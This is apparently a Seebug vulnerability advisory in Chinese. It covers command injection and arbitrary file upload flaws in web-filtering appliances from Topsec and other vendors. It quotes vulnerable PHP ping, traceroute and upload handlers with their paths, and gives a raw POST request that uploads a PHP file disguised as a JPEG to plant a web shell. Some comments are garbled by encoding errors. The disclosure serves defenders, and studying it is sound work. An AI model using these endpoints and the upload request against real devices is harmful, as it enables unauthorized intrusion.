天融信等厂商上网行为管理设备任意命令执行漏洞

2016-05-21T00:00:00
ID SSV:91628
Type seebug
Reporter racobox
Modified 2016-05-21T00:00:00

Description

两处任意命令执行无需登录:

第一处: ``` if(key_exists("text_target", $_GET)

    && key_exists("text_pingcount", $_GET)

    && key_exists("text_packetsize", $_GET))

{

$text_target = $_GET["text_target"];

$text_pingcount = $_GET["text_pingcount"];

$text_packetsize = $_GET["text_packetsize"];

$pingcmd = sprintf("ping %s -c %s -s %s", $text_target, $text_pingcount, $text_packetsize);

exec($pingcmd, $lines);

```

/view/systemConfig/systemTool/ping/ping.php

第二处:

``` $text_target = $_GET["text_target"];

$text_ageout = $_GET["text_ageout"];

$text_minttl = $_GET["text_minttl"];

$text_maxttl = $_GET["text_maxttl"];

$traceroutecmd = sprintf("traceroute %s -f %s -m %s -w %s -q 1", $text_target, $text_minttl, $text_maxttl, $text_ageout);

exec($traceroutecmd, $lines);

$rettraceroutecmd .= _gettext("testing_wait").chr(10).chr(10);

```

/view/systemConfig/systemTool/traceRoute/traceroute.php

利用方式同上。

两处命令执行需登录:

第一处:/view/IPV6/ipv6networktool/ping/ping.php ``` if(key_exists("text_target", $_GET)

    && key_exists("text_pingcount", $_GET)

    && key_exists("text_packetsize", $_GET))

{

$text_target6 = $_GET["text_target"];

$text_pingcount6 = $_GET["text_pingcount"];

$text_packetsize6 = $_GET["text_packetsize"];



$pingcmd = sprintf("ping -c %s -s %s %s", $text_pingcount6, $text_packetsize6, $text_target6);

exec($pingcmd, $lines);

$retpingcmd6 .= _gettext("testing_wait").chr(10).chr(10);

``` 第二处:

/view/IPV6/ipv6networktool/traceroute/traceroute.php ``` $text_target = $_GET["text_target"];

$text_ageout = $_GET["text_ageout"];

$text_minttl = $_GET["text_minttl"];

$text_maxttl = $_GET["text_maxttl"];



$traceroutecmd = sprintf("traceroute6 -6 -f %s -m %s -w %s %s", $text_minttl, $text_maxttl, $text_ageout, $text_target);

exec($traceroutecmd, $lines);

$rettraceroutecmd .= _gettext("testing_wait").chr(10).chr(10);

```

三处任意文件上传getshell需登录:

第一处:

\view\userAuthentication\userDefined\upload.php

``` <?php

$page_name = 'AuthenticationOptions';

include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php");//身份认证

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://.../TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://.../1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link href="/css/skin.css" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="/js/prototype.js"></script>

<script type="text/javascript" src="/js/base.js"></script>

</head>

<body>

<?php

function upload($file,$dir,$name)

{

$max_size=1024000; //500 KB

$max_w = 8800; //最大宽度800像素

$max_h = 8600; //最大高度600像素

$min_w = 10; //最小宽度400像素

$min_h = 10; //最小高度300像素

if($dir) //如果路径不是以"/"结尾则加上"/"

{ if(substr($dir,-1)!="/")

$dir=$dir."/";

}

if($name=="")

$name=$_FILES["$file"][name];

$len=strrpos($name,"."); //取得主文件名长度

if(!$len)

$len=strlen($name);

$name=substr($name,0,$len); //取得主文件名

//添加扩展名

if($_FILES["$file"][type]=="image/gif")

$name=$name.".gif";

if($_FILES["$file"][type]=="image/pjpeg")

$name=$name.".jpg";

if($_FILES["$file"][type]=="image/jpeg")

$name=$name.".jpg";

if($_FILES["$file"][type]=="image/x-png")

$name=$name.".png";

//检查上传过程中是否出现错误

if($_FILES["$file"][error]) //当发生错误时

{

if(($_FILES["$file"][error]==1)||($_FILES["$file"][error]==2))

$info=_gettext('uploadFail');

if($_FILES["$file"][error] ==3)

$info=_gettext('uploadFail');

if($_FILES["$file"][error] ==4)

$info=_gettext('uploadFail');

if($_FILES["$file"][error] ==5)

$info=_gettext('uploadFail');

}

else //当上传成功时

{

if(($_FILES["$file"][type]=="image/gif")||($_FILES["$file"][type]=="image/pjpeg")||($_FILES["$file"][type]=="image/x-png")||($_FILES["$file"][type]=="image/jpeg")) //是合法的文件类型时

{

    if($_FILES["$file"][size]&lt;=$max_size) //检查文件大小

    {

        $size=GetImageSize($_FILES["$file"][tmp_name]);

         if(($size[0]&lt;=$max_w)&&($size[0]&gt;=$min_w)&&($size[1]&lt;=$max_h)&&($size[1]&gt;=$min_h)) //检查图片的长宽

        {

            //复制文件到指定位置。

            copy($_FILES["$file"][tmp_name],$dir.$name); //复制文件,并改名

            if(file_exists($dir.$name))  //检查是否上传成功

    {

        $cmd = "mkdir /home/config/default/Image/";

        exec($cmd);

        copy($_FILES["$file"][tmp_name],"/home/config/default/Image/".$name); //复制文件,并改名

        $info=_gettext('uploadSuccess');

    }

            else

                $info=_gettext('uploadFail');

        }

        else //图片尺寸不合适时

        {

            $info=_gettext('uploadFail_image_size_error');

        }

    }

    else //文件超出限制时

    {

       $info=_gettext('uploadFail_file_too_big');

    }

}

else //文件类型非法时

{

    $info=_gettext('uploadFail_file_type_error');

}

}

return "$info";

}

$info = upload("upImage","/var/www/auth/images/","")

?>

<script language="javascript" type="text/javascript">

alert("&lt;?php echo $info;?&gt;");

window.location.href="list.php";

</script>

</body></html> ```

第二处:

\view\systemObject\certificateAdmin\sslLib\upload.php ``` <?php

$page_name = 'm_certification';

include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php");//ʭ·ވЖ¤

//include_once("E:/ag380-wp/page/nm/model/common_fun.php");

$certDir = '/usr/local/squid/var/temp/';

$result = -1;

function upload(&$errorInfo)

{

    global $certDir;

    global $result;

    $upfilename = 'file';



    $file = $_FILES[$upfilename];



    if($_FILES[$upfilename]['error'] != 0)

    {

        $errorInfo = _gettext('fail').'('.$_FILES[$upfilename]['error'].')';

        return false;

    }



    $tmp_name=$file["tmp_name"];



    if(!is_uploaded_file($tmp_name))

    {

        $errorInfo = _gettext('tmp file error');

        return false;

    }



    $destination = $certDir.$file["name"];



    if(!file_exists($certDir))

        mkdir($certDir);



    if(!move_uploaded_file ($tmp_name, $destination))

    {

        $errorInfo =  _gettext('movefail');

        return false;

    }



$result = load_ssl_certs($destination);



 eturn true;



}









if($_REQUEST)

{

    foreach ($_REQUEST as $key=&gt;&$value)

    {

        if(!is_array($value))

            $value = stripslashes((trim($value)));

    }

}





if ( $_FILES['file']['name']!= '')

{

    upload($reMsg);

    $reMsg1 ="error";

}

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://.../TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://.../1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Ϟ±덢τµµ</title>

<link href="/css/skin.css" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="/js/prototype.js"></script>

<script type="text/javascript" src="/js/base.js"></script>

<script type="text/javascript">

<?php

if( $result != 0 )

    echo "alert('".$reMsg1."!');";

?>

location.href = 'list.php';

</script>

</head>

<body>

</body>

</html> ```

上面两处利用方式:

``` POST /view/systemObject/certificateAdmin/sslLib/upload.php HTTP/1.1

Accept: text/html, application/xhtml+xml, /

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko

Content-Type: multipart/form-data; boundary=---------------------------7e0313222035c

UA-CPU: AMD64

Accept-Encoding: gzip, deflate

Host: ...:9090

Content-Length: 203

Pragma: no-cache

Cookie: PHPSESSID=

Connection: close

-----------------------------7e0313222035c

Content-Disposition: form-data; name="file"; filename="1.php"

Content-Type: image/jpeg

test

-----------------------------7e0313222035c-- ``` 第三处:

/view/fireWall/securityPolicy/upload.php

``` <?php

$page_name = 'm_secpolicy';

include_once($_SERVER["DOCUMENT_ROOT"]."/authenticed_writable.php");

require_once("../../../model/File.php");

print_r($_POST);

$upload = new UploadFile("/var/www/html/upload",'',2*1024);

$upload->run('security_policy_file');

print_r($upload->get_info());

?> ```